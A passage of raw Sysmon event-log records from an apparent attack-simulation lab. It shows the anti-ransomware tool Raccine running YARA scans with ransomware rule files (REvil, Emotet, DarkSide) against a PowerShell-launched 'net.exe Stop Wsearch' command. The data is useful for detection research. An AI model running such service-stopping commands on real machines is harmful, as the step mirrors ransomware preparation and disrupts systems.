-d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258374Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.668{9DBE88B5-5878-61B2-C909-010000000E02}75405592C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-C809-010000000E02}6680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258368Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.657{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-C809-010000000E02}6680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258367Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.657{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-C809-010000000E02}6680C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258366Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.657{9DBE88B5-5878-61B2-C809-010000000E02}6680C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_revil.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258363Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.642{9DBE88B5-5878-61B2-C709-010000000E02}80445084C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-C609-010000000E02}1640C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258356Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.630{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-C609-010000000E02}1640C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258355Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.630{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-C609-010000000E02}1640C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258354Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.630{9DBE88B5-5878-61B2-C609-010000000E02}1640C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_exchange_cryptominer.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258351Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.615{9DBE88B5-5878-61B2-C509-010000000E02}69047568C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-C409-010000000E02}8028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258345Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.604{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-C409-010000000E02}8028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258344Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.603{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-C409-010000000E02}8028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258343Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.603{9DBE88B5-5878-61B2-C409-010000000E02}8028C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_emotet.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258319Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.588{9DBE88B5-5878-61B2-C309-010000000E02}36841172C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-C209-010000000E02}5732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258313Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.576{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-C209-010000000E02}5732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258312Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.576{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-C209-010000000E02}5732C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258311Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.576{9DBE88B5-5878-61B2-C209-010000000E02}5732C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\mal_darkside.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258308Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.560{9DBE88B5-5878-61B2-C109-010000000E02}62127720C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-C009-010000000E02}5132C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258302Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.549{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-C009-010000000E02}5132C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258301Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.548{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-C009-010000000E02}5132C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258300Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.548{9DBE88B5-5878-61B2-C009-010000000E02}5132C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258297Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.534{9DBE88B5-5878-61B2-BF09-010000000E02}31721972C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-BE09-010000000E02}7028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258291Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.522{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-BE09-010000000E02}7028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258290Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.522{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-BE09-010000000E02}7028C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258289Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.522{9DBE88B5-5878-61B2-BE09-010000000E02}7028C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258286Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.507{9DBE88B5-5878-61B2-BD09-010000000E02}81286624C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-BC09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258279Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.496{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-BC09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258278Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.495{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-BC09-010000000E02}4748C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258277Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.495{9DBE88B5-5878-61B2-BC09-010000000E02}4748C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258274Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.479{9DBE88B5-5878-61B2-BB09-010000000E02}81567496C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-BA09-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258267Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.465{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-BA09-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258266Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.465{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-BA09-010000000E02}208C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258265Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.465{9DBE88B5-5878-61B2-BA09-010000000E02}208C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258263Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.462{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program 